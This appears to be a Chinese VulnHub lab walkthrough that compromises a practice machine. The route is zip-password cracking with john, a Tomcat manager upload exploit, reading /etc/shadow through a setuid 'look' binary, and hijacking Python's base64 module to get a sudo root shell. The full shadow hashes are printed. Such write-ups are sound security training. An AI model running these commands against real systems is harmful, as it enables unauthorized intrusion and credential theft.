1、找到靶机ip:192.168.164.133
nmap -sn 192.168.164.0/24
2、扫描靶机端口,开放22、80和8080端口
3、80端口是一个apache的默认页面,8080是一个tomcat的默认页面,8080看起来有点上篇vulnhub文章的味道了,但是爆破模块没有找到用户名和密码,所以只能乖乖去扫描目录,在8080端口下,发现一个backup.zip文件
解压需要密码,使用john进行爆破,得到密码@administrator_hi5
zip2john backup.zip > backup.john
john --wordlist=/usr/share/wordlists/rockyou.txt backup.john
解压之后在tomcat-users.xml文件中发现后台管理员用户和密码admin/melehifokivai,后面的步骤就和前一篇vulnhub文章一样了,使用模块
exploit/multi/http/tomcat_mgr_upload
成功获取shell
4、此时进入的用户是tomcat身份,在/home目录下发现jaye和randy用户,jaye没有可读权限,但是randy目录可读
notes.txt文件
Hey randy this is your system administrator, hope your having a great day! I just wanted to let you know
that I changed your permissions for your home directory. You won't be able to remove or add files for now.
I will change these permissions later on.
See you next Monday randy!
第一个flag文件,user.txt
ca73a018ae6908a7d0ea5d1c269ba4b6
还有一个所有者为root的randombase64.py文件,其他用户不可读
5、到这里其实没什么其他信息了,只能尝试拿之前获得的用户名和密码去撞库,发现jaye/melehifokivai能够成功ssh到靶机,在自己的家目录下的Files文件夹中发现一个look文件,拥有s权限,并且其他用户有x权限
在GTFOBins中查找look命令,发现只能越权读取文件
读取/etc/shadow文件并复制到本地使用john进行爆破
root:$6$fHvHhNo5DWsYxgt0$.3upyGTbu9RjpoCkHfW.1F9mq5dxjwcqeZl0KnwEr0vXXzi7Tld2lAeYeIio/9BFPjUCyaBeLgVH1yK.5OR57.:18888:0:99999:7:::
daemon:*:18858:0:99999:7:::
bin:*:18858:0:99999:7:::
sys:*:18858:0:99999:7:::
sync:*:18858:0:99999:7:::
games:*:18858:0:99999:7:::
man:*:18858:0:99999:7:::
lp:*:18858:0:99999:7:::
mail:*:18858:0:99999:7:::
news:*:18858:0:99999:7:::
uucp:*:18858:0:99999:7:::
proxy:*:18858:0:99999:7:::
backup:*:18858:0:99999:7:::
list:*:18858:0:99999:7:::
irc:*:18858:0:99999:7:::
gnats:*:18858:0:99999:7:::
nobody:*:18858:0:99999:7:::
systemd-network:*:18858:0:99999:7:::
systemd-resolve:*:18858:0:99999:7:::
systemd-timesync:*:18858:0:99999:7:::
messagebus:*:18858:0:99999:7:::
syslog:*:18858:0:99999:7:::
_apt:*:18858:0:99999:7:::
tss:*:18858:0:99999:7:::
uuidd:*:18858:0:99999:7:::
tcpdump:*:18858:0:99999:7:::
avahi-autoipd:*:18858:0:99999:7:::
usbmux:*:18858:0:99999:7:::
rtkit:*:18858:0:99999:7:::
dnsmasq:*:18858:0:99999:7:::
cups-pk-helper:*:18858:0:99999:7:::
speech-dispatcher:!:18858:0:99999:7:::
avahi:*:18858:0:99999:7:::
kernoops:*:18858:0:99999:7:::
saned:*:18858:0:99999:7:::
nm-openvpn:*:18858:0:99999:7:::
hplip:*:18858:0:99999:7:::
whoopsie:*:18858:0:99999:7:::
colord:*:18858:0:99999:7:::
geoclue:*:18858:0:99999:7:::
pulse:*:18858:0:99999:7:::
gnome-initial-setup:*:18858:0:99999:7:::
gdm:*:18858:0:99999:7:::
sssd:*:18858:0:99999:7:::
randy:$6$bQ8rY/73PoUA4lFX$i/aKxdkuh5hF8D78k50BZ4eInDWklwQgmmpakv/gsuzTodngjB340R1wXQ8qWhY2cyMwi.61HJ36qXGvFHJGY/:18888:0:99999:7:::
systemd-coredump:!!:18886::::::
tomcat:$6$XD2Bs.tL01.5OT2b$.uXUR3ysfujHGaz1YKj1l9XUOMhHcKDPXYLTexsWbDWqIO9ML40CQZPI04ebbYzVNBFmgv3Mpd3.8znPfrBNC1:18888:0:99999:7:::
sshd:*:18887:0:99999:7:::
jaye:$6$Chqrqtd4U/B1J3gV$YjeAWKM.usyi/JxpfwYA6ybW/szqkiI1kerC4/JJNMpDUYKavQbnZeUh4WL/fB/4vrzX0LvKVWu60dq4SOQZB0:18887:0:99999:7:::
6、爆破了很久,终于是得到了另一个用户randy的密码07051986randy
7、ssh登录到randy用户,使用sudo -l列出命令
发现可以使用python3.8执行之前提到的randombase64.py,但是根据前面note.txt文件内容和权限查看可以发现只有root用户可以修改此文件,但是文件导入了base64模块
8、找到base64.py存放的位置
写入/bin/bash语句
echo "import os;os.system('/bin/bash')" >> /usr/lib/python3.8/base64.py
9、最后sudo执行文件,拿到root权限和final flag文件